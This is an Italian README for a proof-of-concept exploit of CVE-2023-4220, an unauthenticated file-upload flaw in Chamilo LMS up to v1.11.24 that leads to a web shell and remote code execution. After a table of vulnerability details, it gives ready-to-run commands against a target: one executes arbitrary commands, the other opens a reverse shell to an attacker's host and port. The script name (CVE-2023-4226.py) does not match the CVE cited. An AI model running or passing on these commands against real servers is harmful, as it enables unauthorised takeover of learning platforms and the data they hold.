
POC per CVE-2023-4220 - Chamilo LMS Esecuzione di codice remoto non autenticata tramite upload di file grandi
| Prodotto | Chamilo |
|---|
| Fornitore | Chamilo |
| Gravità | Alta - Gli avversari potrebbero sfruttare vulnerabilità software per ottenere esecuzione di codice remoto non autenticata. |
| Versioni interessate | <= v1.11.24 |
| Versioni testate | v1.11.24 (versione più recente al momento della scrittura) |
| Identificativo CVE | CVE-2023-4220 |
| Descrizione CVE | Caricamento senza restrizioni di file nella funzionalità di upload di file grandi in /main/inc/lib/javascript/bigupload/inc/bigUpload.php in Chamilo LMS <= v1.11.24 consente ad attaccanti non autenticati di effettuare attacchi di cross-site scripting persistente e ottenere esecuzione di codice remoto tramite caricamento di web shell. |
| Classificazione CWE | CWE-434: Caricamento senza restrizioni di file con tipo pericoloso |
| Classificazione CAPEC | CAPEC-650: Caricamento di una Web Shell su un Server Web |
Per eseguire comandi direttamente, usa il seguente comando:
python CVE-2023-4226.py -u http://<target_ip>:<target_port> -c whoami
Per ottenere una reverse shell, usa il seguente comando:
python CVE-2023-4226.py -u http://<target_ip>:<target_port> -lhost <local_ip> -lport <local_port>